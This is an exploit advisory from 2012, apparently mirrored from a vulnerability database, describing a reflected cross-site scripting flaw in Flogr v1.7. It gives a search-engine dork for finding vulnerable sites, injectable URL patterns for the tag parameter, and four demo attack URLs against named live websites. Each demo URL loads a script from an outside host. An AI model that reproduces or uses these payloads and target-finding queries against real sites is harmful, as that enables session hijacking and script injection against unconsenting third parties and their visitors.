Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28277
HistoryJul 11, 2012 - 12:00 a.m.

Flogr V1.7 Xss Vulnerability

2012-07-1100:00:00
vulners.com
20

#############################################################################################

Exploit Title : Flogr V1.7 Xss Vulnerability

Author : Iranian Security & Research Team

Discovered By : Nafsh

Home : sec-lab.ir

Contact : research [at] sec-lab [dot] ir

Date : 23/1/2012 - 16:00

Source : www.flogr.googlecode.com

DorK : inurl:"tag=" "powered by flogr v1.7"

#############################################################################################

Expl0iTs:

http://[TARGET]/recent.php?tag=[xss]

http://[TARGET]/index.php?tag=[xss]

#############################################################################################

Dem0 :

fotos.pecesama.net/recent.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

localsrock.com/bigpictureproject/index.php?tag=<script src%3d//ckers.org/s></script>

rowmanitoba.ca/flogr-1.7.2/recent.php?tag=<script src%3d//ckers.org/s></script>

john.org.ua/recent.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

#############################################################################################

We are : K0242 | Nafsh | Ehram.shahmohamadi

Greetz : All sec-lab researchers

#############################################################################################